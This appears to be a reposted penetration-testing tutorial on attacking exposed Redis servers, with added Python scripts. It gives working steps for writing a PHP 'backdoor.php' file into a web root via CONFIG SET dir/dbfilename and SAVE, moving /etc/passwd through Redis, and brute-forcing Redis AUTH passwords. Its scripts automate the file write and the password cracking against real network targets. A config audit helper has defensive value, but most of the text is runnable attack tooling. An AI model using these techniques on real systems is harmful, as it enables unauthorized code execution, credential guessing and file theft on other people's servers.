REDIS - Export File / Read File / Cracker
Source: Internet  Posted in: distributed cloud computing  Editor: 程序博客网  Time: 2024/06/02 04:34
Export File
If Redis and the web service run on the same server, and the Redis process can write into the web root, we can drop a web shell through Redis and get code execution on the host.
- Connect to redis port (default: 6379).
lab:~/ $ redis-cli -h localhost -p 6379
- Get the current configuration. The entries that matter for what follows are requirepass (empty: no AUTH needed), bind (empty: listening on every interface), and dir and dbfilename (the path that SAVE writes the RDB dump to).
127.0.0.1:6379> CONFIG GET *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) ""
 11) "pidfile"
 12) "/var/run/redis_6379.pid"
 13) "maxmemory"
 14) "3221225472"
 15) "maxmemory-samples"
 16) "5"
 17) "timeout"
 18) "0"
 19) "tcp-keepalive"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-entries"
 30) "512"
 31) "list-max-ziplist-value"
 32) "64"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "min-slaves-to-write"
 70) "0"
 71) "min-slaves-max-lag"
 72) "10"
 73) "hz"
 74) "10"
 75) "cluster-node-timeout"
 76) "15000"
 77) "cluster-migration-barrier"
 78) "1"
 79) "cluster-slave-validity-factor"
 80) "10"
 81) "repl-diskless-sync-delay"
 82) "5"
 83) "cluster-require-full-coverage"
 84) "yes"
 85) "no-appendfsync-on-rewrite"
 86) "no"
 87) "slave-serve-stale-data"
 88) "yes"
 89) "slave-read-only"
 90) "yes"
 91) "stop-writes-on-bgsave-error"
 92) "yes"
 93) "daemonize"
 94) "yes"
 95) "rdbcompression"
 96) "yes"
 97) "rdbchecksum"
 98) "yes"
 99) "activerehashing"
100) "yes"
101) "repl-disable-tcp-nodelay"
102) "no"
103) "repl-diskless-sync"
104) "no"
105) "aof-rewrite-incremental-fsync"
106) "yes"
107) "aof-load-truncated"
108) "yes"
109) "appendonly"
110) "no"
111) "dir"
112) "/var/redis/6379"
113) "maxmemory-policy"
114) "noeviction"
115) "appendfsync"
116) "everysec"
117) "save"
118) "900 1 300 10 60 10000"
119) "loglevel"
120) "notice"
121) "client-output-buffer-limit"
122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
123) "unixsocketperm"
124) "0"
125) "slaveof"
126) ""
127) "notify-keyspace-events"
128) ""
129) "bind"
130) ""
127.0.0.1:6379>
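Reading 130 entries by eye is error-prone. The script below is an added example, not code from the original post: it parses redis-cli's numbered CONFIG GET output into a dict and flags the settings that decide whether the file-write technique is usable. The sample input is an abbreviated copy of the listing above (constructed for the example); the finding texts and the protected-mode inference are the example author's choices.

```python
import re

# Abbreviated copy of the redis-cli "CONFIG GET *" listing above
# (constructed sample input; the real listing has 130 entries).
SAMPLE = '''  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
111) "dir"
112) "/var/redis/6379"
117) "save"
118) "900 1 300 10 60 10000"
129) "bind"
130) ""
'''

# redis-cli prints one quoted element per line: '  3) "requirepass"'
LINE_RE = re.compile(r'^\s*\d+\)\s*"(.*)"$')


def parse_config_get(text):
    """Turn redis-cli's numbered 'CONFIG GET *' output into {param: value}.

    Elements alternate parameter name / value, so the odd elements are
    names and the even ones are values.
    """
    values = [m.group(1) for m in map(LINE_RE.match, text.splitlines()) if m]
    if len(values) % 2:
        raise ValueError("odd number of elements; the listing is truncated")
    return dict(zip(values[0::2], values[1::2]))


def audit(cfg):
    """Return the findings relevant to the dir/dbfilename/SAVE technique."""
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append("requirepass is empty: no AUTH needed")
    if cfg.get("bind", "") == "":
        findings.append("bind is empty: listening on all interfaces")
    # protected-mode was added in Redis 3.2; a listing without it comes from
    # an older server that has no such safety net at all.
    if "protected-mode" not in cfg:
        findings.append("no protected-mode setting: Redis older than 3.2")
    elif cfg["protected-mode"] != "yes":
        findings.append("protected-mode is off")
    # dir and dbfilename are settable at runtime with CONFIG SET, so this is
    # only where SAVE writes right now, not where it has to write.
    findings.append("SAVE currently writes %s/%s"
                    % (cfg.get("dir", "?"), cfg.get("dbfilename", "?")))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_config_get(SAMPLE)):
        print("-", finding)
```

Paste the real output of `redis-cli CONFIG GET *` in place of SAMPLE; a server with requirepass set, bind restricted and protected-mode on yields only the informational SAVE line.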
- Export the DB file.
During a pentest we can export a web shell the same way: point dir at the web root, give the dump file a .php name, store the payload in a key and force a SAVE. The dump is a binary RDB file, but PHP ignores everything outside <?php ... ?>, so the embedded tag still executes. The Redis process needs write access to the chosen directory, and SAVE is synchronous, so its reply tells us whether the write succeeded. With rdbcompression yes (as in the listing above) Redis may LZF-compress longer string values, which would mangle the tag; keep the payload short or run CONFIG SET rdbcompression no first.
127.0.0.1:6379> CONFIG SET dir /var/www/
OK
127.0.0.1:6379> CONFIG SET dbfilename backdoor.php
OK
127.0.0.1:6379> SET data "<?php phpinfo(); ?>"
OK
127.0.0.1:6379> SAVE
OK
127.0.0.1:6379> QUIT
We can fetch the file and confirm that the PHP ran:
root@kali:~# curl -o data.txt http://localhost:8080/backdoor.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 50181    0 50181    0     0  2219k      0 --:--:-- --:--:-- --:--:-- 2450k
root@kali:~# grep --color -i -n -a phpinfo data.txt
25:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
- Restore the Redis configuration.
Delete the key we added, put dir and dbfilename back, then SAVE so the real dump is rewritten in its original place. backdoor.php itself stays in /var/www/ and has to be removed on the host; Redis cannot delete it.
127.0.0.1:6379> CONFIG SET dbfilename dump.rdb
OK
127.0.0.1:6379> CONFIG SET dir /var/redis/6379/
OK
127.0.0.1:6379> KEYS *
1) "bar"
2) "key"
3) "foo"
4) "data"
127.0.0.1:6379> DEL data
(integer) 1
127.0.0.1:6379> KEYS *
1) "bar"
2) "key"
3) "foo"
127.0.0.1:6379> SAVE
OK
Read File
redis-cli -x reads the last argument from standard input, so the first command stores the contents of /etc/passwd from the machine running redis-cli into a hash field, and --raw prints the value back byte for byte. The file is read by the client, not by the Redis server: this moves a file through a reachable Redis instance (bulk strings are binary-safe), it does not read files off the Redis host.
redis-cli -x HSET passwd text </etc/passwd
redis-cli --raw HGET passwd text >/tmp/passwd
redis-cli DEL passwd
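Both procedures above (the dir/dbfilename/SAVE file write and the HSET/HGET file transfer) are typed into redis-cli. The script below is an added example, not code from the original post, that speaks the RESP protocol itself so the same steps can be driven from a tool with every reply checked and the original settings restored even when a step fails. The host, port, web root, file name and payload in the main block are assumptions for a lab target; resp_encode and resp_parse run offline.

```python
import socket

CRLF = b"\r\n"


class ReplyError(Exception):
    """Server returned a RESP error ('-ERR ...', '-NOAUTH ...')."""


class Incomplete(Exception):
    """The buffer does not yet hold a whole reply; read more first."""


def resp_encode(*args):
    """Encode a command as a RESP array of bulk strings (binary-safe)."""
    out = [b"*%d" % len(args) + CRLF]
    for a in args:
        if isinstance(a, str):
            a = a.encode()
        out.append(b"$%d" % len(a) + CRLF + a + CRLF)
    return b"".join(out)


def resp_parse(buf, pos=0):
    """Parse one reply at buf[pos:] -> (value, next_pos).

    '+' -> str, '-' -> ReplyError, ':' -> int, '$' -> bytes (None for
    nil), '*' -> list.  Raises Incomplete when more bytes are needed.
    """
    end = buf.find(CRLF, pos)
    if end < 0:
        raise Incomplete()
    kind, line, nxt = buf[pos:pos + 1], buf[pos + 1:end], end + 2
    if kind == b"+":
        return line.decode(), nxt
    if kind == b"-":
        raise ReplyError(line.decode())
    if kind == b":":
        return int(line), nxt
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, nxt
        if len(buf) < nxt + n + 2:
            raise Incomplete()
        return buf[nxt:nxt + n], nxt + n + 2
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, nxt = resp_parse(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError("unknown RESP type %r" % kind)


class Redis:
    """Minimal blocking client; every reply is checked and errors raise."""

    def __init__(self, host="127.0.0.1", port=6379, password=None, timeout=5):
        self.sock = socket.create_connection((host, port), timeout)
        if password:
            self.cmd("AUTH", password)

    def cmd(self, *args):
        self.sock.sendall(resp_encode(*args))
        buf = b""
        while True:
            chunk = self.sock.recv(65536)
            if not chunk:
                raise ConnectionError("server closed the connection")
            buf += chunk
            try:
                return resp_parse(buf)[0]
            except Incomplete:
                continue


def write_webshell(r, web_root, filename, payload):
    """dir/dbfilename/SAVE as in the post; old settings are restored in
    'finally'.  The written .php file itself stays on disk."""
    old_dir = r.cmd("CONFIG", "GET", "dir")[1].decode()
    old_file = r.cmd("CONFIG", "GET", "dbfilename")[1].decode()
    try:
        r.cmd("CONFIG", "SET", "dir", web_root)  # errors if dir cannot be entered
        r.cmd("CONFIG", "SET", "dbfilename", filename)
        r.cmd("SET", "data", payload)
        return r.cmd("SAVE")  # synchronous: "OK" or ReplyError
    finally:
        r.cmd("CONFIG", "SET", "dbfilename", old_file)
        r.cmd("CONFIG", "SET", "dir", old_dir)
        r.cmd("DEL", "data")


def put_file(r, key, data):
    """Same as 'redis-cli -x HSET key text <file': the client reads the file."""
    return r.cmd("HSET", key, "text", data)


def get_file(r, key):
    """Same as 'redis-cli --raw HGET key text': bytes come back unchanged."""
    return r.cmd("HGET", key, "text")


if __name__ == "__main__":
    r = Redis("127.0.0.1", 6379)  # lab target (assumption)
    print(write_webshell(r, "/var/www/", "backdoor.php", "<?php phpinfo(); ?>"))
    with open("/etc/passwd", "rb") as f:
        put_file(r, "passwd", f.read())
    print(get_file(r, "passwd")[:64])
    r.cmd("DEL", "passwd")
```

Because arguments are sent as RESP bulk strings rather than on one inline line, payloads containing spaces, quotes or newlines arrive intact, which is also why the file transfer works for binary files.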
REDIS Cracker
If the Redis server sets requirepass, we can brute-force it with the following demo. Redis has no lockout or rate limit on AUTH, so a plain loop over a wordlist is enough.
#!/usr/bin/env python
# -*- coding: utf8 -*-
import socket
import logging

logging.basicConfig(level=logging.DEBUG, format="[*] %(funcName)s - %(message)s")
logger = logging.getLogger('redis_cracker')

BUFSIZE = 1024


def crack_redis(host, port, password):
    """Try one password.

    Returns (True, password) on success, (True, None) if the server needs
    no AUTH at all, and (False, None) if the attempt failed.
    """
    logger.debug('cracking redis %s:%s with %s' % (host, port, password))
    # create a socket for the redis connection
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)
    ret = sock.connect_ex((host, port))
    # failed to make a redis connection
    if ret != 0:
        logger.info("failed to connect to redis")
        return False, None
    try:
        # Check whether AUTH is enabled by sending an INFO request.
        # encode/decode keeps the script working under python2 and python3.
        sock.send('INFO\r\n'.encode('utf-8'))
        data = sock.recv(BUFSIZE).decode('utf-8', 'replace')
        if "NOAUTH Authentication required" in data:
            # crack password
            sock.send(('AUTH %s\r\n' % password).encode('utf-8'))
            data = sock.recv(BUFSIZE).decode('utf-8', 'replace')
            # auth succeeded
            if "+OK" in data:
                logger.info("redis pass: [%s]\n" % password)
                return True, password
            # auth failed: log the server's error line
            logger.debug("%s\n" % data.strip())
            return False, None
        logger.info("No password protection\n")
        return True, None
    finally:
        sock.close()


if __name__ == "__main__":
    passwords = ['admin', 'pass', 'password', '123']
    host = "localhost"
    port = 6379
    for p in passwords:
        done, pwd = crack_redis(host, port, p)
        if done:
            break
Now we can crack the local Redis server.
root@kali:~# python2 crack_redis.py
[*] crack_redis - cracking redis localhost:6379 with admin
[*] crack_redis - -ERR invalid password
[*] crack_redis - cracking redis localhost:6379 with pass
[*] crack_redis - -ERR invalid password
[*] crack_redis - cracking redis localhost:6379 with password
[*] crack_redis - redis pass: [password]
The password is [password].
root@kali:~# redis-cli -h localhost -p 6379
localhost:6379> AUTH password
OK
Authentication is successful.
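The demo above treats anything other than +OK as a failed guess, which is fine for the Redis 2.x/3.x lab it was written against but misreads newer servers. The function below is an added example (not from the original post) that classifies the AUTH reply: the "-ERR invalid password" text of Redis 5 and earlier, the "-WRONGPASS" reply of Redis 6 and later (where AUTH also accepts a username), and the two replies a server gives when no password is configured at all. The cracker loop uses it, reuses one connection (Redis keeps the connection open after a failed AUTH) and frames each command as a RESP array so a password containing spaces is sent as one argument. Host, port and wordlist are assumptions; the reply strings in the usage are constructed.

```python
import socket


def encode_cmd(*args):
    """RESP array framing: each argument is one bulk string."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a.encode() if isinstance(a, str) else a
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def classify_auth_reply(reply):
    """Map the raw AUTH reply to 'ok', 'wrong', 'noauth' or 'error'."""
    line = reply.split(b"\r\n", 1)[0]
    if line == b"+OK":
        return "ok"
    if line.startswith(b"-WRONGPASS"):               # Redis 6+ (ACL)
        return "wrong"
    if line.startswith(b"-ERR invalid password"):    # Redis 5 and earlier
        return "wrong"
    if (line.startswith(b"-ERR Client sent AUTH, but no password is set")   # <= 5
            or b"called without any password configured" in line):        # 6+
        return "noauth"
    return "error"  # e.g. -ERR wrong number of arguments, -NOPERM


def crack(host, port, wordlist, username=None, timeout=5):
    """Return the working password, or None when AUTH is not required.

    Raises RuntimeError when the list is exhausted or the server answers
    with something that is neither success nor a wrong-password reply.
    """
    sock = socket.create_connection((host, port), timeout)
    try:
        for pw in wordlist:
            args = ("AUTH", username, pw) if username else ("AUTH", pw)
            sock.sendall(encode_cmd(*args))
            verdict = classify_auth_reply(sock.recv(4096))
            if verdict == "ok":
                return pw
            if verdict == "noauth":
                return None
            if verdict == "error":
                raise RuntimeError("unexpected reply while trying %r" % pw)
        raise RuntimeError("wordlist exhausted")
    finally:
        sock.close()


if __name__ == "__main__":
    # Lab target and wordlist are assumptions for this example.
    print(crack("127.0.0.1", 6379, ["admin", "pass", "password", "123"]))
```

Against a Redis 6+ server that uses ACL users rather than a bare requirepass, pass `username="default"` (or the user under attack); the reply classification is the same in both modes.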
References
CN - Trying to hack Redis via HTTP requests
EN - Trying to hack Redis via HTTP requests